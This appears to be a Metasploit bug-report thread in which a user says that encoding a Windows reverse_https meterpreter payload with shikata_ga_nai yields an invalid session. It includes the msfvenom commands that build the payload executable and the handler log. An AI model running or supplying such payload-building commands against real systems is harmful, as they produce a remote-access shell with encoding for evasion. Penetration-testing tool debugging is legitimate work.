Invalid session when using encoder

Question

Invalid session when using encoder

Silur opened this issue 9 years ago · 1 comments

I've run into the following situation, tested multiple times on multiple machines:

msfvenom -p windows/meterpreter/reverse_https -f exe -o test.exe LHOST=xy
test.exe

Succesfully opens a meterpreter session, I can do everything on the machine, however when i use an encoder:

msfvenom -p windows/meterpreter/reverse_https -f exe -o test.exe -e x86/shikata_ga_nai LHOST=xy
test.exe
I get the following on my handler side:
[] Starting the payload handler...
[] 127.0.0.1:37888 (UUID: 60278c9ddd1657f9/x86=1/windows=1/2015-07-27T16:16:58Z) Redirecting stageless connection ...
[] 127.0.0.1:37890 (UUID: 60278c9ddd1657f9/x86=1/windows=1/2015-07-27T16:16:58Z) Attaching orphaned/stageless session ...
[] Meterpreter session 1 opened (127.0.0.1:8443 -> 127.0.0.1:37890) at 2015-07-27 18:18:57 +0200
meterpreter > pwd
[-] Unknown command: pwd.
[-] Meterpreter session 1 is not valid and will be closed
[*] 127.0.0.1 - Meterpreter session 1 closed.

seems like using an encoder results in an error with the communication, hope someone can help me with this

Answer 1 · 2015-07-27T18:11:53.000Z

This is another issue at the metasploit-payloads repo. Closing this one.